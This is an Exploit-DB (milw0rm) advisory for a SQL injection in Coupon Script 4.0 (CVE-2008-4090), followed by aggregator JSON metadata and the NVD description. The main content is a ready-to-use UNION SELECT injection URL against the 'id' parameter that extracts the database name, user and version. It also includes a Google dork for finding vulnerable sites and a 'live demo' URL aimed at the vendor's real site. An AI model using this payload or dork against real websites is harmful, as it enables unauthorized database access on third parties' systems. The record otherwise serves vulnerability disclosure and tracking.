ID EDB-ID:6348Type exploitdbReporter Hussin XModified 2008-09-02T00:00:00
Description
Coupon Script 4.0 (id) Remote SQL Injection Vulnerability. CVE-2008-4090. Webapps exploit for php platform
|___________________________________________________|
|
| Coupon Script 4.0 (id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : WwW.Hussin-X.CoM | WwW.tryag.CoM
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://www.couponscript.com/
|
| DorK : inurl:couponsite/index.php?page=
|___________________________________________________|
Exploit:
________
www.[target].com/Script/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*
L!VE DEMO:
_________
http://couponscript.com/couponsite/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*
____________________________( Greetz )_________________________________
|
| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
|
| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
|______________________________________________________________________
Im IRAQi
# milw0rm.com [2008-09-02]
{"id": "EDB-ID:6348", "hash": "f84bf53fa42ba7489a39f0143505e5a6", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Coupon Script 4.0 id Remote SQL Injection Vulnerability", "description": "Coupon Script 4.0 (id) Remote SQL Injection Vulnerability. CVE-2008-4090. Webapps exploit for php platform", "published": "2008-09-02T00:00:00", "modified": "2008-09-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6348/", "reporter": "Hussin X", "references": [], "cvelist": ["CVE-2008-4090"], "lastseen": "2016-02-01T00:41:29", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-02-01T00:41:29"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-4090"]}], "modified": "2016-02-01T00:41:29"}, "vulnersScore": 7.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/6348/", "sourceData": "|___________________________________________________|\n|\n| Coupon Script 4.0 (id) Remote SQL Injection Vulnerability\n|\n|___________________________________________________\n|---------------------Hussin X----------------------|\n|\n| Author: Hussin X\n|\n| Home : WwW.Hussin-X.CoM | WwW.tryag.CoM\n|\n| email: darkangel_g85[at]Yahoo[DoT]com\n|\n|\n|___________________________________________________\n| |\n|\n| script : http://www.couponscript.com/\n|\n| DorK : inurl:couponsite/index.php?page=\n|___________________________________________________|\n\nExploit: \n________\n\n\n\nwww.[target].com/Script/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*\n\n\n\n\nL!VE DEMO:\n_________\n\n\nhttp://couponscript.com/couponsite/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*\n\n\n\n\n\n\n\n____________________________( Greetz )_________________________________\n|\n| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC\n|\n| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe\n| \n| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker\n|______________________________________________________________________\n \n\n Im IRAQi\n\n# milw0rm.com [2008-09-02]\n", "osvdbidlist": ["47888"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:28", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in index.php in PHP Coupon Script 4.0 allows remote attackers to execute arbitrary SQL commands via the id parameter in an addtocart action, a different vector than CVE-2007-2672.", "modified": "2017-09-29T01:31:00", "id": "CVE-2008-4090", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4090", "published": "2008-09-15T17:12:00", "title": "CVE-2008-4090", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
